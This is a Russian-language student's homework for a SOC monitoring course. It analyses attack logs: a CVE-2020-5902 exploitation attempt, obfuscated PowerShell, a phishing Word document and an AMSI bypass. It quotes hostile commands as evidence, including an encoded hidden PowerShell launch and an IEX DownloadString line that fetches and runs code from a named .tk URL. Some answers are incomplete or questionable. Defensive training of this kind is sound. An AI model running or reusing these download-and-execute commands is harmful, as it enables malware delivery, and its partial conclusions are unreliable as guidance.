# Мониторинг ИБ. Работа специалиста SOC 1. Задание №1 1.1 Опишите, что происходит (чего добиваются атакующие). - попытка экплуатации уязвимости CVE-2020-5902 - удаленное выполненение кода (RCE) на систему с помощью продуктов F5 BIG-IP 1.2 Выделите признаки, по которым понятно, что происходит атака. - command=wget+... 1.3 Выделите IoС'и, которые могут быть использованы для выявления подобной активности в будущем. - ..; - FGVP5 1.4 Укажите, каким образом можно удостовериться в том, удалось ли атакующим достигнуть того, чего они добивались этим запросом. - соединение установлено: Connection: keep-alive - попытка запуска командной оболочки sh 2. Задание 2 2.1 Что подозрительного в событии? - используется обфусцированный код PowerShell: - командлет Invoke-Expression, который вычисляет или выполняет указанную строку в виде команды и возвращает результаты выражения или команды - параметр "Command" со значением:New-Object, Net.WebClient, DownloadString и каким-то URL (http://...com/.../...), а также параметром System - в целом команда была примерно такая: Invoke-Expression (New-Object System.Net.WebClient).DownloadString('http://...com/.../...') 2.2 С какой целью реализовано? - для обхода сигнатурного анализа антивирусных программ 3. Задание 3 3.1. Что в этих событиях является подозрительным? - запуск PowerShell и Winword; - декодирование команды IEX (New-Object System.Net.WebClient).DownloadString('http://omni-consumer-pr0ducts.tk/favicon.ico'); - создание файла C:\Users\user\Downloads\employee termination letter.docx; - NT AUTHORITY\SYSTEM; - usgthrsvc; - запуск процессов VERCLSID.EXE, WINWORD.EXE, OSPPSVC.EXE, WmiPrvSE.exe 3.2. Какие признаки указанных событий на это указывают? - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Nop -sta -noni -w hidden -encodedCommand - usgthrsvc - NT AUTHORITY\SYSTEM - "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\user\Downloads\employee termination letter.docx" - C:\Users\user\AppData\Local\Temp\severance payment form.lnk:Zone.Identifier - C:\Windows\Prefetch\VERCLSID.EXE-CD081540.pf - C:\Windows\Prefetch\WINWORD.EXE-7D220BFE.pf - C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE 3.3. Какие IoC'и можно выделить из этих событий? - Nop -sta -noni -w hidden -encodedCommand - usgthrsvc - NT AUTHORITY\SYSTEM 3.4. Опишите подробно суть подозрительных действий в системе, зафиксированных в этом журнале. - совместно запускаются PowerSlhell и WINWORD; - запускается Antimalware Service Executable - процесс позволяет Защитнику Windows отслеживать потенциальные угрозы; - запуск процесса wmiprvse.exe - позволяющий программам на компьютере получать различную информацию о системе; - Nop -sta -noni -w hidden -encodedCommand с параметрами не загружать профиль текущего пользователя и окно, а в закодированном виде команда IEX с кодом для загрузки и запуска какой-то строки; - NT AUTHORITY\SYSTEM - запуск приложения под локальной учетной записью - usgthrsvc - вирус подмены страниц; - процессы VERCLSID.EXE, WINWORD.EXE, OSPPSVC.EXE - так как некоторые вирусы маскируются под них (если они расположены не в своих каталогах) - запуск процесса WmiPrvSE.exe - который позволяет программам на компьютере получать различную информацию о системе; - создание документа и ссылки на какую-то форму. 4. Задание 4 4.1 Что произошло на узле? - "text": "Обнаружена попытка выполнить потенциально опасную команду на узле larteshina.plat.form", 4.2 С помощью чего это удалось добиться? При раскодировании данных видно была попытка выполнить команду из PowerShell - раскодируем данные из "object.process.cmdline"  - видим что тут несколько вложенных объектов - раскодирование с помощью Gzip Decompress данные из объекта System.IO.Compression.GzipStream  - есть какие-то данные в [Byte[]]$mkuA = [System.Convert]::FromBase64String  Для дальнейшей работы пока не хватает знаний! Увы! 5. Задание 5 5.1 К какому семейству принадлежит данное ВПО? - троянские программы (Троян:Win32/Amynex.A) 5.2 Перечислите имена всех файлов, которые могли быть загружены на компьютер с помощью данного скрипта. ipc_20201126 Задание 6 6.1 Опишите, что же на самом деле произошло на компьтере пользователя. Удаленное подключение к машине пользователя, путем обхода инструмента безопасности AMSI 6.2 Укажите необходимые подробности и признаки, по которым можно выявлять подобную активность, а так же необходимые данные для осуществления мер по реагированию. Признаки: - наличие кодировки base64; - запуск консольного окна - conhost.exe; - выдача сообщения - Network connection detected Необходимые данные для осуществления мер по реагированию: - Разработка правил корреляции по имеющимся признакам.